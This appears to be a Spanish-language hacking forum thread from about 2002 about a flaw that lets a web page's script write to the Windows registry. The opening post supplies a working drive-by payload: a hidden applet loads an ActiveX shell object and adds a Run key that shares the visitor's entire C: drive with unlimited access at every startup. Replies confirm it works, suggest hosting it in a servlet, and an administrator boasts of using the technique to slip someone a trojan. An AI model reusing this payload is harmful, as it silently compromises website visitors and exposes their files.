Resultados 1 al 10 de 10

Tema: JavaScript que puede modificar el registro

  1. #1 JavaScript que puede modificar el registro 
    Medio
    Fecha de ingreso
    Dec 2001
    Mensajes
    87
    Descargas
    0
    Uploads
    0
    Existe una manera de poder añadir claves al registro mediante un código JavaScript, lo que es lo mismo, es posible que al visitar una web, sin darnos cuenta, se estén añadiendo claves potencialmente peligrosas.

    Esto es un ejemplo sencillo que reproduce el fallo, introduciendo este códigoen una web, se consigue el efecto deseado, modificando el registro de la víctima.

    #script#
    document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

    function f() {
    try {
    a1=document.applets[0];
    a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
    a1.createInstance();
    Shl = a1.GetObject();
    a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
    try {
    Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersi on\\Run\\share", "cmd.exe /c net share c=c:\ /UNLIMITED");


    }
    catch(e) {}
    }
    catch(e) {}
    }

    setTimeout("f()", 1000);

    #/script#

    (sustituye los simbolos "#script#" y "#/script#" para ke funcione.

    Este sencillo script va a intoducir una clave en el inicio del Windows que hará que se comparta la unidad c:\ con permisos ilimitados, mediante la ejecución del comando:

    net share c=c:\ /UNLIMITED

    Tal vez no sea la manera mas limpia de compartir una unidad (podríamos haber introducido directamente las claves necesarias en

    "HKLM\SYSTEM\CurrentControlSet\Services\lanmanserv er\Shares\Security"

    que es la clave del registro que se ocupa de ello), pero si creo que es una manera mucho mas explicativa.

    Aunque esto es sólo un ejemplo, hay que recordar para los que no estén muy al dia, que manipulando adecuadamente el registro de un Windows, podemos hacer con ese sistema "casi" cualquier cosa que deseemos.
    Citar  
     

  2. #2 pregunta..¿? 
    Avanzado
    Fecha de ingreso
    Dec 2001
    Ubicación
    BCN
    Mensajes
    469
    Descargas
    0
    Uploads
    0
    El javaScript y el VisualBasic Script estan integrados en Winzorra desde la version 98. Pero estos son algo distintos de los que se usan en Web. Hay caracteristicas que no estan habilitadas en Los apllets dentro del HTML.

    ¿Has provado a ponerlo en una Wé a ver si chuta?
    La resitencia es futil, todos sereis asimilados.
    NeoGenessis
    Citar  
     

  3. #3  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    Aaahaah, yo usé esa tecnica para colarle un troyano, que el lo veía como *.txt mandala. Bien
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  4. #4  
    Medio
    Fecha de ingreso
    Dec 2001
    Mensajes
    87
    Descargas
    0
    Uploads
    0
    Si chuta,tb lo puedes meter en un servlet
    Citar  
     

  5. #5  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    Servlet??
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  6. #6  
    Medio
    Fecha de ingreso
    Dec 2001
    Mensajes
    87
    Descargas
    0
    Uploads
    0
    Los Servlets son las respuesta de la tecnología Java a la programación CGI. Son programas que se ejecutan en un servidor Web y construyen páginas Web.

    esse CrAcKzMe !!
    Citar  
     

  7. #7  
    Medio
    Fecha de ingreso
    Feb 2002
    Mensajes
    99
    Descargas
    0
    Uploads
    0
    cañero,cañero
    yo sabia q de esta manera se podia hacer q visitando una pagina,se ejecute el archivo q quieras en el ordena de quien lo visita pero esta ya es al bomba
    alguien x ahi tiene algun manual sencillito pa aprender script???????????
    Citar  
     

  8. #8  
    Medio
    Fecha de ingreso
    Dec 2001
    Mensajes
    131
    Descargas
    0
    Uploads
    0
    Eso está muy de moda en las pages porno.... A un conocido mio se le metió de página de inicio en el Internet Explorer la página porno que visitó, pero no sólo se le metió en las opciones de internet, sino que tambien lo hizo en el registro del sistema. Tras reiniciar el sistema y ver que nada había cambiado me fui al registro y .... voilá.... allí estaba la clave que habían introducido. Es una putada, desde luego.

    Este tipo de cosas suelen pasar si se usan M$ Windows y esas cochinadas....
    Última edición por Dupont; 05-04-2002 a las 15:49
    Citar  
     

  9. #9  
    Administrador Foros HH
    Fecha de ingreso
    Nov 2001
    Ubicación
    Spain
    Mensajes
    2.234
    Descargas
    0
    Uploads
    0
    Ese code es triunfante seeeeeee Dupontttttt
    Todos desean saber, pero pocos pagar el trabajo que vale.

    [[NORMAS DEL FORO]]
    Citar  
     

  10. #10  
    Iniciado
    Fecha de ingreso
    Jan 2004
    Ubicación
    granada
    Mensajes
    20
    Descargas
    0
    Uploads
    0
    mu buen articulo sacado de cyruxnet.com.ar--->
    |nf3rN0
    Citar  
     

Temas similares

  1. javascript
    Por Se_ChInI en el foro PROGRAMACION DESKTOP
    Respuestas: 4
    Último mensaje: 29-02-2008, 15:16
  2. modificar javascript
    Por paquita007 en el foro INTRUSION
    Respuestas: 2
    Último mensaje: 08-11-2007, 13:48
  3. Javascript en php...........
    Por Rbot en el foro GENERAL
    Respuestas: 12
    Último mensaje: 30-09-2006, 11:10
  4. Javascript
    Por <PICCOLO> en el foro PROGRAMACION WEB
    Respuestas: 2
    Último mensaje: 02-10-2002, 22:55

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •